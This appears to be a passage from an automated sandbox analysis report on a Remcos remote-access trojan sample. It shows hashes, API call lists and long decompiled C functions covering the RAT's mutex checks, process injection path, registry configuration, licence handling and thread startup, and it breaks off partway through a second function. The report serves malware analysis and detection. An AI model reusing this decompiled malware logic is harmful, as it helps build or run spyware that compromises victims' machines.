                                    • Opcode Fuzzy Hash: be6cad12c344e77614ab7161f93b502ddfc4643f3128554765fcc8d2a5d5d92a
                                    • Instruction Fuzzy Hash: 38014F7190011CABCB00EB90DC45EDDB7BCEF44305F10016AF905B2196EEB46A898B98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00422251, Relevance: 1.5, APIs: 1, Instructions: 10networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: recv
                                    • String ID:
                                    • API String ID: 1507349165-0
                                    • Opcode ID: 770d8840f0cfa992c73ee2df09c2a5214786fe1339814540061c585bff84fad7
                                    • Instruction ID: e48ef5bedcc115dfdcbe715373a672fa69d6f329cf61ba9e4e3f48fb4f6a798c
                                    • Opcode Fuzzy Hash: 770d8840f0cfa992c73ee2df09c2a5214786fe1339814540061c585bff84fad7
                                    • Instruction Fuzzy Hash: 9DC02B3900420CBFCF011FA0CD0CCBD3FADD7443517008024F90102251C533C62097A4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0042F8B9, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_0002F8C5,0042F5A8), ref: 0042F8BE
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: e558ee6a599fcacb4150c7bdc9a2a2691efb109ccac4c0442e4bfa04ac03d4bd
                                    • Instruction ID: 86e206407557d0ac1bda88e2f45e42cbf33a4e9732861bd4a6740e282559d687
                                    • Opcode Fuzzy Hash: e558ee6a599fcacb4150c7bdc9a2a2691efb109ccac4c0442e4bfa04ac03d4bd
                                    • Instruction Fuzzy Hash:
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040C2BE, Relevance: 63.8, APIs: 16, Strings: 20, Instructions: 774synchronizationCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 89%
                                    			E0040C2BE(void* __edx, void* __eflags, intOrPtr _a4, char* _a12) {
				char _v524;
				char _v700;
				char _v720;
				char _v724;
				char _v728;
				char _v744;
				char _v756;
				char _v760;
				char _v772;
				struct _SECURITY_ATTRIBUTES* _v776;
				signed int _v780;
				char _v784;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t71;
				void* _t78;
				void** _t86;
				void* _t90;
				CHAR* _t93;
				long _t95;
				int _t97;
				char _t100;
				void* _t101;
				void* _t105;
				void* _t121;
				void* _t122;
				void* _t129;
				char _t135;
				char* _t137;
				signed char* _t139;
				signed char* _t141;
				void* _t144;
				void* _t146;
				void* _t160;
				void* _t163;
				intOrPtr _t165;
				void* _t166;
				intOrPtr _t182;
				intOrPtr* _t185;
				void* _t187;
				void* _t193;
				char* _t196;
				void* _t199;
				char* _t203;
				void* _t210;
				signed short* _t214;
				void* _t215;
				void* _t216;
				signed int _t217;
				CHAR* _t224;
				void* _t226;
				char* _t229;
				char* _t231;
				intOrPtr* _t233;
				void* _t235;
				intOrPtr* _t240;
				intOrPtr* _t244;
				void* _t246;
				void* _t254;
				void* _t265;
				void* _t268;
				struct _SECURITY_ATTRIBUTES* _t269;
				int _t272;
				char* _t360;
				signed int _t382;
				signed int _t386;
				int _t388;
				signed int _t394;
				signed int _t397;
				intOrPtr _t423;
				void* _t433;
				void* _t435;
				signed int _t452;
				void* _t455;
				char* _t461;
				void* _t462;
				char* _t465;
				void* _t467;
				void* _t472;
				char* _t477;
				intOrPtr* _t481;
				void* _t484;
				void* _t485;
				void* _t486;
				signed int _t492;
				void* _t495;
				void* _t496;
				void* _t497;
				void* _t499;
				void* _t501;
				void* _t502;
				void* _t506;

				_t444 = __edx;
				 *0x46bd28 = _a4;
				_push(_t268);
				L0040CC55( &_v724, __edx, __eflags);
				_t495 = (_t492 & 0xfffffff8) - 0x2f4;
				E004020EC(_t268, _t495, __edx, __eflags, 0x46c59c);
				_t496 = _t495 - 0x18;
				E004020EC(_t268, _t496, __edx, __eflags,  &_v728); // executed
				_t71 = E00417478( &_v756, __edx);
				_t497 = _t496 + 0x30;
				E0040D458(__edx, _t71);
				L00401E74( &_v760, __edx);
				_t284 = _a12;
				if( *_a12 != 0x2d) {
					L6:
					_t461 = 0x46c578;
					__eflags =  *((char*)(L00401F95(L00401E49(0x46c578, _t444, __eflags, 3))));
					 *0x46bb01 = __eflags != 0;
					_t78 = E00405343(_t268,  &_v756, L004075E6( &_v780, "Software\\", __eflags, L00401E49(0x46c578, _t444, __eflags, 0xe)), 0x46c578, __eflags, "\\");
					_t471 = 0x46c518;
					L00401FD1(0x46c518, _t77, 0x46c518, _t78);
					L00401FC7();
					L00401FC7();
					L00405A0B(_t268, 0x46c5cc, "Exe");
					_t269 = 0;
					L00401E49(0x46c578, _t77, __eflags, 0x32);
					__eflags =  *(E00405220(0));
					 *0x46bd4e = __eflags != 0;
					L00401E49(0x46c578, _t77, __eflags, 0x33);
					_t86 = E00405220(0);
					__eflags =  *_t86;
					 *0x46bd4f =  *_t86 != 0;
					__eflags =  *0x46bd4e - _t269; // 0x0
					if(__eflags == 0) {
						L8:
						_v776 = _t269;
						_t472 = OpenMutexA(0x100000, _t269, "Remcos_Mutex_Inj");
						__eflags = _t472;
						if(_t472 != 0) {
							WaitForSingleObject(_t472, 0xea60);
							CloseHandle(_t472);
						}
						_t447 = L00401F95(0x46c518); // executed
						_t90 = E00410885(_t89, "Inj",  &_v776); // executed
						__eflags = _t90;
						if(__eflags != 0) {
							_t447 = L00401F95(0x46c518);
							L00410CE2(_t259, __eflags, "Inj");
						}
						L00401FAD(0x46c548, L00401E49(_t461, _t447, __eflags, 0xe));
						_t93 = L00401F95(0x46c548);
						_t462 = 0;
						_t272 = 1;
						CreateMutexA(0, 1, _t93); // executed
						_t95 = GetLastError();
						__eflags = _t95 - 0xb7;
						if(_t95 == 0xb7) {
							L45:
							L00401FC7();
							_t97 = _t272;
							goto L5;
						} else {
							E0040CD09();
							GetModuleFileNameW(0, "C:\Windows\SysWOW64\DpiScaling.exe", 0x104);
							_t100 = L00417614(0x46c548);
							_push(0x46c548);
							_t448 = 0x80000002;
							 *0x46beb4 = _t100;
							_t101 = E004108E2( &_v772, 0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", "ProductName"); // executed
							_t499 = _t497 + 0xc;
							L00401FD1(0x46c5b4, 0x80000002, 0x46c5b4, _t101);
							L00401FC7();
							__eflags =  *0x46beb4;
							if( *0x46beb4 == 0) {
								_push(" (32 bit)");
							} else {
								_push(" (64 bit)");
							}
							L00405A02(_t272, 0x46c5b4, _t462);
							_t105 =  *0x46bd20;
							__eflags = _t105;
							if(_t105 != 0) {
								 *0x46a9d0 =  *_t105();
							}
							_t477 = 0x46c578;
							__eflags = _v776 - _t462;
							if(__eflags == 0) {
								_t433 = L00401E49(0x46c578, _t448, __eflags, 0x2e);
								__eflags =  *((char*)(L00401F95(_t433)));
								if(__eflags != 0) {
									__eflags =  *0x46bd20 - _t462; // 0x74cce630
									if(__eflags != 0) {
										__eflags =  *0x46a9d0 - _t462; // 0x1
										if(__eflags == 0) {
											_t448 = L00401F95(0x46c518);
											_t254 = L0041083B(0x46c518, _t253, "origmsc");
											_pop(_t435);
											__eflags = _t254;
											if(__eflags == 0) {
												L00405F77(_t272, _t435, _t448);
											}
										} else {
											_push(_t433);
											_push(_t433);
											__eflags = L0040A713() - 0xffffffff;
											if(__eflags == 0) {
												E00406071(__eflags);
											}
										}
									}
								}
							}
							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 0x27))));
							if(__eflags != 0) {
								E0040D3F7();
							}
							L00409DC9(_t272, 0x46c4e8, L00401F95(L00401E49(_t477, _t448, __eflags, 0xb)));
							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 4))));
							 *0x46bb02 = __eflags != 0;
							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 5))));
							 *0x46bafb = __eflags != 0;
							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 8))));
							 *0x46bb00 = __eflags != 0;
							__eflags =  *((char*)(L00401F95(L00401E49(_t477, _t448, __eflags, 3))));
							if(__eflags != 0) {
								_t240 = L00401F95(L00401E49(_t477, _t448, __eflags, 0x30));
								_t25 = _t240 + 2; // 0x2
								_t448 = _t25;
								do {
									_t423 =  *_t240;
									_t240 = _t240 + 2;
									__eflags = _t423 - _t462;
								} while (_t423 != _t462);
								__eflags = _t240 - _t448;
								if(__eflags != 0) {
									_t244 = L00401F95(L00401E49(_t477, _t448, __eflags, 9));
									_t246 = L00401F95(L00401E49(0x46c578, _t448, __eflags, 0x30));
									_t448 =  *_t244;
									L00401EFA(0x46c530,  *_t244, _t244, E0041805B( &_v780,  *_t244, _t246));
									L00401EF0();
									_t477 = 0x46c578;
								}
							}
							__eflags = _v776 - _t462;
							if(_v776 != _t462) {
								L00431F00(_t462,  &_v524, _t462, 0x208);
								_t121 = E00402489();
								_t122 = L00401F95(0x46c560);
								_t449 = L00401F95(0x46c518);
								L00410A30(_t124, "exepath",  &_v524, 0x208, _t122, _t121);
								_t501 = _t499 + 0x20;
								L00409DC9(_t272, 0x46c500,  &_v524);
								_t465 = 0x46c578;
								goto L47;
							} else {
								__eflags =  *0x46bb01;
								if(__eflags == 0) {
									L00409DC9(_t272, 0x46c500, "C:\Windows\SysWOW64\DpiScaling.exe");
								} else {
									_t229 = L00401F95(L00401E49(_t477, _t448, __eflags, 0x1e));
									_t231 = L00401F95(L00401E49(_t477, _t448, __eflags, 0xc));
									_t233 = L00401F95(L00401E49(0x46c578, _t448, __eflags, 9));
									__eflags =  *_t229;
									__eflags =  *_t231;
									_t477 = 0x46c578;
									_t235 = L00401F95(L00401E49(0x46c578, _t448,  *_t231, 0xa));
									L0040A987( *_t233, L00401F95(L00401E49(0x46c578, _t448, __eflags, 0x30)), _t235, ((_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0 | __eflags != 0x00000000) & 0x000000ff, (_t232 & 0xffffff00 |  *_t229 != 0x00000000) & 0x000000ff);
									_t499 = _t499 + 0xc;
									_t272 = 1;
									_t462 = 0;
								}
								_t210 = E00402489();
								_t452 = 2;
								_t394 =  ~(0 | __eflags > 0x00000000) | (_t210 + 0x00000001) * _t452;
								_push(_t394);
								_v780 = _t394;
								_t486 = E0042F4C6(_t394, (_t210 + 1) * _t452 >> 0x20, _t477, __eflags);
								__eflags = _t486;
								if(_t486 == 0) {
									_t486 = _t462;
								} else {
									L00431F00(_t462, _t486, _t462, _v780);
									_t499 = _t499 + 0xc;
								}
								_t214 = L00401EEB(0x46c500);
								_t455 = _t486 - _t214;
								__eflags = _t455;
								_t467 = 2;
								do {
									_t397 =  *_t214 & 0x0000ffff;
									 *(_t214 + _t455) = _t397;
									_t214 = _t214 + _t467;
									__eflags = _t397;
								} while (_t397 != 0);
								_push(_t397);
								_t215 = E00402489();
								_t216 = L00401F95(0x46c560);
								_t217 = E00402489();
								E00410C80(L00401F95(0x46c518), __eflags, "exepath", _t486, 2 + _t217 * 2, _t216, _t215); // executed
								E0042F4CF(_t486);
								_t501 = _t499 + 0x1c;
								_t465 = 0x46c578;
								L00401E49(0x46c578, _t219, __eflags, 0xd);
								_t449 = "0";
								__eflags = L0040EAD9(__eflags);
								if(__eflags == 0) {
									L47:
									_push(_t272);
									_t129 = L00401F95(L00401E49(_t465, _t449, __eflags, 0x34));
									_t502 = _t501 - 0x18;
									E00402084(_t272, _t502, _t129);
									_push("licence");
									_t450 = L00401F95(0x46c518); // executed
									E00410AA7(0x46c518, _t131); // executed
									_t497 = _t502 + 0x20;
									_t135 = L00436769(_t133, L00401F95(L00401E49(_t465, _t131, __eflags, 0x28)));
									 *0x46bb03 = _t135;
									__eflags = _t135 - 2;
									if(_t135 != 2) {
										__eflags = _t135 - _t272;
										if(__eflags == 0) {
											_t388 = 0;
											__eflags = 0;
											goto L51;
										}
									} else {
										_t388 = _t272;
										L51:
										L00418F59(_t272, _t388, _t450);
										__eflags = 0;
										CreateThread(0, 0,  &M00418D28, 0, 0, 0);
									}
									_t137 = L00401F95(L00401E49(_t465, _t450, __eflags, 0x37));
									_t139 = L00401F95(L00401E49(_t465, _t450, __eflags, 0x10));
									_t141 = L00401F95(L00401E49(_t465, _t450, __eflags, 0xf));
									__eflags =  *_t137;
									_t471 = 0x46c578;
									_t144 = L00436769(_t142, L00401F95(L00401E49(0x46c578, _t450,  *_t137, 0x36)));
									_t146 = L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x11));
									E0040846D(_t139,  *_t141 & 0x000000ff,  *_t139 & 0x000000ff, L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x31)), _t146, _t144, (_t140 & 0xffffff00 | __eflags != 0x00000000) & 0x000000ff); // executed
									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x14)))) - 1;
									if(__eflags != 0) {
										_t461 = CreateThread;
									} else {
										_t199 = 2;
										_t485 = E0042F218(_t450, 0x46c578, __eflags, _t199);
										 *_t485 = 0;
										_t386 = L00401E49(0x46c578, _t450, __eflags, 0x35);
										_t203 = L00401F95(_t386);
										_t461 = CreateThread;
										__eflags =  *_t203;
										 *((char*)(_t485 + 1)) = _t386 & 0xffffff00 | __eflags != 0x00000000;
										CreateThread(0, 0, 0x415938, _t485, 0, 0);
										_t471 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(_t471, _t450, __eflags, 0x16)))) - 1;
									if(__eflags == 0) {
										_t193 = 2;
										_t484 = E0042F218(_t450, _t471, __eflags, _t193);
										 *_t484 = 1;
										_t382 = L00401E49(0x46c578, _t450, __eflags, 0x35);
										_t196 = L00401F95(_t382);
										__eflags =  *_t196;
										__eflags = 0;
										 *((char*)(_t484 + 1)) = _t382 & 0xffffff00 |  *_t196 != 0x00000000;
										CreateThread(0, 0, 0x415938, _t484, 0, 0);
										_t471 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(_t471, _t450, __eflags, 0x23)))) - 1;
									if(__eflags == 0) {
										 *0x46ba75 = 1;
										_t185 = L00401F95(L00401E49(_t471, _t450, __eflags, 0x25));
										_t187 = L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x26));
										_t450 =  *_t185;
										L00401EFA(0x46c0e0,  *_t185, _t185, E0041800F( &_v780,  *_t185, _t187));
										L00401EF0();
										__eflags = 0;
										CreateThread(0, 0, 0x401bcd, 0, 0, 0);
										_t471 = 0x46c578;
									}
									__eflags =  *((intOrPtr*)(L00401F95(L00401E49(_t471, _t450, __eflags, 0x2b)))) - 1;
									if(__eflags == 0) {
										_t471 = L00401F95(L00401E49(_t471, _t450, __eflags, 0x2c));
										_t182 = L00436769(_t180, L00401F95(L00401E49(0x46c578, _t450, __eflags, 0x2d)));
										__eflags =  *_t471;
										_t450 = _t182;
										__eflags =  *_t471 != 0;
										L0040A679(_t182);
									}
									_t160 = E00416D9E( &_v772, _t461, __eflags); // executed
									L00401EFA(0x46c584, _t450, _t471, _t160);
									_t360 =  &_v776;
									L00401EF0();
									_t163 =  *0x46bd14;
									_t269 = 0;
									__eflags = _t163;
									if(_t163 != 0) {
										 *_t163(0); // executed
									}
									CreateThread(_t269, _t269, E0040D0B5, _t269, _t269, _t269); // executed
									__eflags =  *0x46bd4e;
									if( *0x46bd4e != 0) {
										CreateThread(_t269, _t269, 0x40fac7, _t269, _t269, _t269);
									}
									__eflags =  *0x46bd4f;
									if( *0x46bd4f != 0) {
										CreateThread(_t269, _t269, 0x40ffe5, _t269, _t269, _t269);
									}
									_t165 =  *0x46a9d0; // 0x1
									_t166 = _t165 - _t269;
									__eflags = _t166;
									if(__eflags == 0) {
										goto L71;
									} else {
										__eflags = _t166 - 1;
										if(__eflags == 0) {
											_push("Administrator");
											goto L72;
										}
									}
									goto L73;
								} else {
									_t224 = L00401E49(0x46c578, "0", __eflags, 0xd);
									_t506 = _t501 - 0x18;
									_t449 = _t224;
									E004172DA(_t506, _t224);
									_t226 = L0040CE44(__eflags);
									_t501 = _t506 + 0x18;
									__eflags = _t226 - _t272;
									if(__eflags != 0) {
										goto L47;
									} else {
										_t272 = 3;
										goto L45;
									}
								}
							}
						}
					} else {
						_v780 = 0;
						_t265 = E00410885(L00401F95(0x46c518), "WD",  &_v780);
						__eflags = _t265;
						if(_t265 != 0) {
							L00410CE2(L00401F95(0x46c518), __eflags, "WD");
							L0040FD95();
							L71:
							_push("User");
							L72:
							L004075C2(_t269, _t497 - 0x18, "Access level: ", _t461, __eflags, E00402084(_t269,  &_v776));
							E00402084(_t269, _t497 - 4, "[Info]");
							L00416C80(_t269, _t461);
							_t360 =  &_v784;
							L00401FC7(); // executed
							L73:
							E00411929(); // executed
							asm("int3");
							_push(_t471);
							_t481 = _t360 + 0x68;
							L0040D515(_t481);
							_t284 = _t481;
							 *_t284 = 0x460788;
							 *_t284 = 0x460744;
							return E004304F6(_t284);
						} else {
							goto L8;
						}
					}
				} else {
					__eflags =  *((char*)(__ecx + 1)) - 0x6c;
					if(__eflags != 0) {
						goto L6;
					} else {
						__eax =  *(__ecx + 2) & 0x000000ff;
						__eflags = __al;
						if(__eflags != 0) {
							goto L6;
						} else {
							_push(__ecx);
							_push(__ecx);
							__ecx =  &_v700;
							__eax = E0040D544( &_v700, __edx, __eflags, "license_code.txt", 2);
							__ecx = 0x46c578;
							__ecx = L00401E49(0x46c578, __edx, __eflags, 0x34);
							__edx = __eax;
							__ecx =  &_v720;
							__eax = L0040E8BB( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							__eax = E0040D4F5( &_v720, __edx, __eflags);
							__ecx =  &_v720;
							L74();
							__ecx =  &_v744;
							L00401FC7() = 0;
							__eax = 1;
							__eflags = 1;
							L5:
							return _t97;
						}
					}
				}
			}

































































































                                    0x0040c2be
                                    0x0040c2d4
                                    0x0040c2d9
                                    0x0040c2dc
                                    0x0040c2e1
                                    0x0040c2eb
                                    0x0040c2f0
                                    0x0040c2fa
                                    0x0040c303
                                    0x0040c308
                                    0x0040c30c
                                    0x0040c315
                                    0x0040c31a
                                    0x0040c320
                                    0x0040c387
                                    0x0040c387
                                    0x0040c3a5
                                    0x0040c3a8
                                    0x0040c3ca
                                    0x0040c3d0
                                    0x0040c3d8
                                    0x0040c3e1
                                    0x0040c3ea
                                    0x0040c3f9
                                    0x0040c3fe
                                    0x0040c405
                                    0x0040c416
                                    0x0040c418
                                    0x0040c41f
                                    0x0040c426
                                    0x0040c42b
                                    0x0040c42d
                                    0x0040c434
                                    0x0040c43a
                                    0x0040c462
                                    0x0040c46d
                                    0x0040c477
                                    0x0040c479
                                    0x0040c47b
                                    0x0040c483
                                    0x0040c48a
                                    0x0040c48a
                                    0x0040c4a7
                                    0x0040c4a9
                                    0x0040c4b0
                                    0x0040c4b2
                                    0x0040c4bc
                                    0x0040c4be
                                    0x0040c4c3
                                    0x0040c4d5
                                    0x0040c4dc
                                    0x0040c4e4
                                    0x0040c4e6
                                    0x0040c4e9
                                    0x0040c4ef
                                    0x0040c4f5
                                    0x0040c4fa
                                    0x0040c87d
                                    0x0040c881
                                    0x0040c886
                                    0x00000000
                                    0x0040c500
                                    0x0040c500
                                    0x0040c510
                                    0x0040c516
                                    0x0040c51b
                                    0x0040c526
                                    0x0040c52b
                                    0x0040c534
                                    0x0040c539
                                    0x0040c544
                                    0x0040c54d
                                    0x0040c552
                                    0x0040c55b
                                    0x0040c564
                                    0x0040c55d
                                    0x0040c55d
                                    0x0040c55d
                                    0x0040c569
                                    0x0040c56e
                                    0x0040c573
                                    0x0040c575
                                    0x0040c579
                                    0x0040c579
                                    0x0040c57e
                                    0x0040c583
                                    0x0040c587
                                    0x0040c592
                                    0x0040c599
                                    0x0040c59c
                                    0x0040c59e
                                    0x0040c5a4
                                    0x0040c5a6
                                    0x0040c5ac
                                    0x0040c5d0
                                    0x0040c5d2
                                    0x0040c5d7
                                    0x0040c5d8
                                    0x0040c5da
                                    0x0040c5dc
                                    0x0040c5dc
                                    0x0040c5ae
                                    0x0040c5ae
                                    0x0040c5af
                                    0x0040c5b5
                                    0x0040c5b8
                                    0x0040c5ba
                                    0x0040c5ba
                                    0x0040c5b8
                                    0x0040c5ac
                                    0x0040c5a4
                                    0x0040c59c
                                    0x0040c5f1
                                    0x0040c5f4
                                    0x0040c5f6
                                    0x0040c5f6
                                    0x0040c611
                                    0x0040c62a
                                    0x0040c62d
                                    0x0040c644
                                    0x0040c647
                                    0x0040c65e
                                    0x0040c661
                                    0x0040c674
                                    0x0040c677
                                    0x0040c684
                                    0x0040c689
                                    0x0040c689
                                    0x0040c68c
                                    0x0040c68c
                                    0x0040c68f
                                    0x0040c692
                                    0x0040c692
                                    0x0040c697
                                    0x0040c69b
                                    0x0040c6a8
                                    0x0040c6bd
                                    0x0040c6c2
                                    0x0040c6d5
                                    0x0040c6de
                                    0x0040c6e3
                                    0x0040c6e3
                                    0x0040c69b
                                    0x0040c6e8
                                    0x0040c6ec
                                    0x0040c89c
                                    0x0040c8ab
                                    0x0040c8b3
                                    0x0040c8d1
                                    0x0040c8d3
                                    0x0040c8d8
                                    0x0040c8e8
                                    0x0040c8ed
                                    0x00000000
                                    0x0040c6f2
                                    0x0040c6f2
                                    0x0040c6f9
                                    0x0040c78f
                                    0x0040c6ff
                                    0x0040c70a
                                    0x0040c71c
                                    0x0040c731
                                    0x0040c736
                                    0x0040c73e
                                    0x0040c744
                                    0x0040c75c
                                    0x0040c776
                                    0x0040c77d
                                    0x0040c780
                                    0x0040c781
                                    0x0040c781
                                    0x0040c799
                                    0x0040c7a3
                                    0x0040c7ab
                                    0x0040c7ad
                                    0x0040c7ae
                                    0x0040c7b7
                                    0x0040c7ba
                                    0x0040c7bc
                                    0x0040c7ce
                                    0x0040c7be
                                    0x0040c7c4
                                    0x0040c7c9
                                    0x0040c7c9
                                    0x0040c7d5
                                    0x0040c7de
                                    0x0040c7de
                                    0x0040c7e0
                                    0x0040c7e1
                                    0x0040c7e1
                                    0x0040c7e4
                                    0x0040c7e8
                                    0x0040c7ea
                                    0x0040c7ea
                                    0x0040c7ef
                                    0x0040c7f7
                                    0x0040c7ff
                                    0x0040c80a
                                    0x0040c829
                                    0x0040c82f
                                    0x0040c834
                                    0x0040c837
                                    0x0040c840
                                    0x0040c845
                                    0x0040c851
                                    0x0040c853
                                    0x0040c8f2
                                    0x0040c8f2
                                    0x0040c8fe
                                    0x0040c903
                                    0x0040c909
                                    0x0040c90e
                                    0x0040c91d
                                    0x0040c91f
                                    0x0040c924
                                    0x0040c938
                                    0x0040c943
                                    0x0040c949
                                    0x0040c94b
                                    0x0040c951
                                    0x0040c953
                                    0x0040c955
                                    0x0040c955
                                    0x00000000
                                    0x0040c955
                                    0x0040c94d
                                    0x0040c94d
                                    0x0040c957
                                    0x0040c957
                                    0x0040c95c
                                    0x0040c968
                                    0x0040c968
                                    0x0040c975
                                    0x0040c987
                                    0x0040c999
                                    0x0040c99e
                                    0x0040c9a3
                                    0x0040c9c0
                                    0x0040c9d2
                                    0x0040c9f1
                                    0x0040ca09
                                    0x0040ca0b
                                    0x0040ca54
                                    0x0040ca0d
                                    0x0040ca0f
                                    0x0040ca16
                                    0x0040ca22
                                    0x0040ca29
                                    0x0040ca2b
                                    0x0040ca30
                                    0x0040ca36
                                    0x0040ca48
                                    0x0040ca4b
                                    0x0040ca4d
                                    0x0040ca4d
                                    0x0040ca6a
                                    0x0040ca6c
                                    0x0040ca70
                                    0x0040ca77
                                    0x0040ca81
                                    0x0040ca88
                                    0x0040ca8a
                                    0x0040ca8f
                                    0x0040ca95
                                    0x0040caa1
                                    0x0040caa4
                                    0x0040caa6
                                    0x0040caa6
                                    0x0040cabb
                                    0x0040cabd
                                    0x0040cac3
                                    0x0040cad0
                                    0x0040cae5
                                    0x0040caea
                                    0x0040cafd
                                    0x0040cb06
                                    0x0040cb0b
                                    0x0040cb17
                                    0x0040cb19
                                    0x0040cb19
                                    0x0040cb2e
                                    0x0040cb30
                                    0x0040cb49
                                    0x0040cb58
                                    0x0040cb5d
                                    0x0040cb60
                                    0x0040cb63
                                    0x0040cb66
                                    0x0040cb66
                                    0x0040cb6f
                                    0x0040cb7a
                                    0x0040cb7f
                                    0x0040cb83
                                    0x0040cb88
                                    0x0040cb8d
                                    0x0040cb8f
                                    0x0040cb91
                                    0x0040cb94
                                    0x0040cb94
                                    0x0040cba0
                                    0x0040cba2
                                    0x0040cba9
                                    0x0040cbb5
                                    0x0040cbb5
                                    0x0040cbb7
                                    0x0040cbbe
                                    0x0040cbca
                                    0x0040cbca
                                    0x0040cbcc
                                    0x0040cbd1
                                    0x0040cbd1
                                    0x0040cbd3
                                    0x00000000
                                    0x0040cbd5
                                    0x0040cbd5
                                    0x0040cbd8
                                    0x0040cbda
                                    0x00000000
                                    0x0040cbda
                                    0x0040cbd8
                                    0x00000000
                                    0x0040c859
                                    0x0040c85d
                                    0x0040c862
                                    0x0040c865
                                    0x0040c869
                                    0x0040c86e
                                    0x0040c873
                                    0x0040c876
                                    0x0040c878
                                    0x00000000
                                    0x0040c87a
                                    0x0040c87c
                                    0x00000000
                                    0x0040c87c
                                    0x0040c878
                                    0x0040c853
                                    0x0040c6ec
                                    0x0040c43c
                                    0x0040c440
                                    0x0040c453
                                    0x0040c45a
                                    0x0040c45c
                                    0x0040cbef
                                    0x0040cbf9
                                    0x0040cbfe
                                    0x0040cbfe
                                    0x0040cc03
                                    0x0040cc17
                                    0x0040cc26
                                    0x0040cc2b
                                    0x0040cc33
                                    0x0040cc37
                                    0x0040cc3c
                                    0x0040cc3c
                                    0x0040cc41
                                    0x0040cc42
                                    0x0040cc43
                                    0x0040cc48
                                    0x0040cc4d
                                    0x0040e032
                                    0x0040c177
                                    0x0040c183
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040c45c
                                    0x0040c322
                                    0x0040c322
                                    0x0040c326
                                    0x00000000
                                    0x0040c328
                                    0x0040c328
                                    0x0040c32c
                                    0x0040c32e
                                    0x00000000
                                    0x0040c330
                                    0x0040c330
                                    0x0040c331
                                    0x0040c339
                                    0x0040c33d
                                    0x0040c344
                                    0x0040c34e
                                    0x0040c355
                                    0x0040c357
                                    0x0040c35b
                                    0x0040c360
                                    0x0040c364
                                    0x0040c369
                                    0x0040c36d
                                    0x0040c372
                                    0x0040c37b
                                    0x0040c37d
                                    0x0040c37d
                                    0x0040c37e
                                    0x0040c384
                                    0x0040c384
                                    0x0040c32e
                                    0x0040c326

                                    APIs
                                    • OpenMutexA.KERNEL32 ref: 0040C471
                                    • WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 0040C483
                                    • CloseHandle.KERNEL32(00000000), ref: 0040C48A
                                    • CreateMutexA.KERNELBASE(00000000,00000001,00000000,00000000,0000000E), ref: 0040C4E9
                                    • GetLastError.KERNEL32 ref: 0040C4EF
                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\SysWOW64\DpiScaling.exe,00000104), ref: 0040C510
                                      • Part of subcall function 0040E8BB: __EH_prolog.LIBCMT ref: 0040E8C0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Mutex$CloseCreateErrorFileH_prologHandleLastModuleNameObjectOpenSingleWait
                                    • String ID: (32 bit)$ (64 bit)$Access level: $Administrator$C:\Windows\SysWOW64\DpiScaling.exe$Exe$Exe$Inj$ProductName$Remcos$Remcos_Mutex_Inj$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Sept-AITAB5$Software\$User$[Info]$exepath$licence$license_code.txt$origmsc
                                    • API String ID: 1247502528-626796739
                                    • Opcode ID: 703840713e08c2232aace42187958cdef69e432d48f940163b25cfb5a8ccc0cc
                                    • Instruction ID: 97ecaa49e5e083256040f844ff0fd3ae96e39466cf8f0e182fdc5e320802d438
                                    • Opcode Fuzzy Hash: 703840713e08c2232aace42187958cdef69e432d48f940163b25cfb5a8ccc0cc
                                    • Instruction Fuzzy Hash: 5432F460B443516BDA1577729CA6B3F26898B8170CF04053FB542BB2E3EE7C9D4583AE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00411929, Relevance: 30.5, APIs: 6, Strings: 11, Instructions: 743sleepnetworkthreadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 85%
                                    			E00411929() {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v20;
				char _v32;
				char _v56;
				char _v80;
				char _v104;
				char _v128;
				char _v140;
				void* _v163;
				char _v164;
				char _v188;
				char _v212;
				char _v236;
				char _v260;
				char _v284;
				char _v308;
				char _v332;
				char _v356;
				char _v380;
				char _v404;
				char _v428;
				char _v452;
				char _v476;
				char _v500;
				char _v524;
				char _v548;
				char _v572;
				char _v596;
				char _v620;
				char _v644;
				char _v668;
				char _v692;
				char _v716;
				char _v740;
				char _v764;
				char _v788;
				char _v812;
				char _v836;
				char _v860;
				char _v884;
				char _v908;
				char _v932;
